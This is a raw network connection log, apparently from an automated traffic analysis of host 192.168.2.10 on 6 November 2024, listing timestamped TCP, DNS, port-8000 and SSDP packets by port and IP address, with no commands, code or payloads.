                                                                                                                                            Nov 6, 2024 16:40:52.017503023 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017507076 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017540932 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017954111 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017966986 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.018013954 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.018018007 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.018050909 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.019617081 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.019632101 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.019681931 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.019685984 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.019716978 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020183086 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020411015 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020426035 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020481110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020484924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020519972 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020634890 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020648003 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020680904 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020684958 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020714045 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020735025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.021718025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.021771908 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073451042 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073476076 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073524952 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073550940 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073566914 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073673964 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073673964 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073685884 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073704004 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073724985 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073730946 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073770046 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073770046 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073956013 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.371445894 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.371696949 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.371712923 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.371762991 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.371767044 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.371802092 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.372976065 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.372989893 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.373047113 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.373054981 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.373092890 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.375449896 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.375477076 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.375516891 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.375520945 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.375544071 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.375562906 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.375950098 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.375967979 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.376012087 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.376015902 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.376055956 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.376118898 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.376132965 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.376174927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.376178980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.376215935 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.377372980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.377389908 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.377441883 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.377444983 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.377485991 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.378151894 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.378173113 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.378216028 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.378218889 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.378242016 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.378257990 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.378520966 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.378535032 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.378587008 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.378591061 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.378621101 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.431155920 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.431184053 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.431322098 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.431341887 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.431400061 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.431590080 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.431603909 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.431654930 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.431659937 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.431704044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.432235956 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.432250023 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.432300091 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.432303905 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.432343006 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.432672977 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.432686090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.432737112 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.432740927 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.432785034 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.467606068 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.467633009 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.467721939 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.467730045 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.467783928 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.488830090 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.489917040 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.489943027 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.490029097 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.490032911 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.490089893 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.490698099 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.490712881 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.490772009 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.490777016 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.490809917 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.491524935 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.491544008 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.491601944 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.491605997 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.491651058 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.492139101 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.492153883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.492207050 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.492211103 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.492242098 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.492278099 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.493089914 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.493103027 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.493155956 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.493160009 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.493197918 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.495106936 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.495121002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.495181084 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.495183945 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.495224953 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.498789072 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.498821020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.499001026 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.499005079 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.499048948 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.499473095 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.499491930 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.499541044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.499545097 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.499588013 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.500426054 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.500441074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.500484943 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.500488043 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.500516891 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.501163006 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501178980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501229048 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.501233101 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501271009 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.501542091 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501559019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501601934 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.501605988 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501642942 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.501710892 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501727104 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501771927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.501775980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.501815081 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.550637960 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.550668001 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.550942898 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.550954103 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.551004887 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.551342010 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:37.054344893 CET3252057358120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:37.057703972 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:37.057804108 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:42:37.974668026 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:42:38.081993103 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.167337894 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:47.167538881 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.173445940 CET5735932520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.176353931 CET5736032520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:47.178347111 CET3252057359120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:47.181188107 CET3252057360120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:47.181304932 CET5736032520192.168.2.10120.27.243.153
                                                                                                                                            Nov 6, 2024 16:43:48.228708982 CET3252057360120.27.243.153192.168.2.10
                                                                                                                                            Nov 6, 2024 16:43:48.284986019 CET5736032520192.168.2.10120.27.243.153
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 6, 2024 16:40:14.939805031 CET5402053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:15.377311945 CET53540201.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:18.200925112 CET53508271.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:20.272250891 CET6128453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:21.269759893 CET6128453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:21.407257080 CET53612841.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:21.407479048 CET53612841.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:24.815979958 CET5816153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:24.818273067 CET5061653192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET53581611.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:25.565762997 CET6197953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:25.816654921 CET5061653192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET53506161.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET53506161.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.093278885 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:26.107685089 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.113012075 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.120371103 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.124435902 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.128519058 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.131423950 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.132817030 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.137305021 CET5909453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.286636114 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.335293055 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.335452080 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.336807013 CET5909953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.342461109 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.369191885 CET53619791.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.375659943 CET5347553192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.576039076 CET53534751.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.608295918 CET53590991.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.608715057 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.616324902 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.616519928 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.623446941 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.623603106 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.630683899 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.630814075 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:26.638008118 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.844070911 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.928164959 CET8000902747.92.202.235192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:26.936920881 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:26.938056946 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:26.938412905 CET534768000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:27.002422094 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:27.002422094 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.201967001 CET5909453192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET53590941.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET53590941.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.816458941 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:27.817034006 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:28.199829102 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.210088015 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.228014946 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.252310991 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.431875944 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.566091061 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:28.810869932 CET6198053192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:29.989955902 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:29.989955902 CET534771900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:30.021692991 CET53619801.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:31.400717020 CET90278000192.168.2.1047.102.130.81
                                                                                                                                            Nov 6, 2024 16:40:31.400763035 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:32.113881111 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:32.146684885 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.162239075 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.170187950 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.176843882 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.177767992 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.236522913 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.236623049 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.243459940 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.278858900 CET5382953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.296195984 CET53538291.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.458899021 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.459172964 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.460481882 CET5724953192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.465991974 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.970666885 CET53572491.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.970988035 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.977638960 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.977791071 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.984564066 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.984833956 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:32.992218971 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:32.996814013 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:33.003587008 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:34.163188934 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:34.185591936 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:35.278654099 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:35.398471117 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:35.498857021 CET5648153192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:35.605325937 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:35.770466089 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET53564811.1.1.1192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:37.085035086 CET90278000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:37.456243992 CET8000902747.92.202.235192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:37.470400095 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:37.470753908 CET572508000192.168.2.1047.92.202.235
                                                                                                                                            Nov 6, 2024 16:40:37.476475000 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:37.476517916 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:37.870971918 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:37.871175051 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:38.276552916 CET80009027111.206.4.176192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:38.296828032 CET80005725047.92.202.235192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.498070955 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:40.498137951 CET572511900192.168.2.10192.168.2.1
                                                                                                                                            Nov 6, 2024 16:40:41.260948896 CET4983253192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:41.395823956 CET53498321.1.1.1192.168.2.10
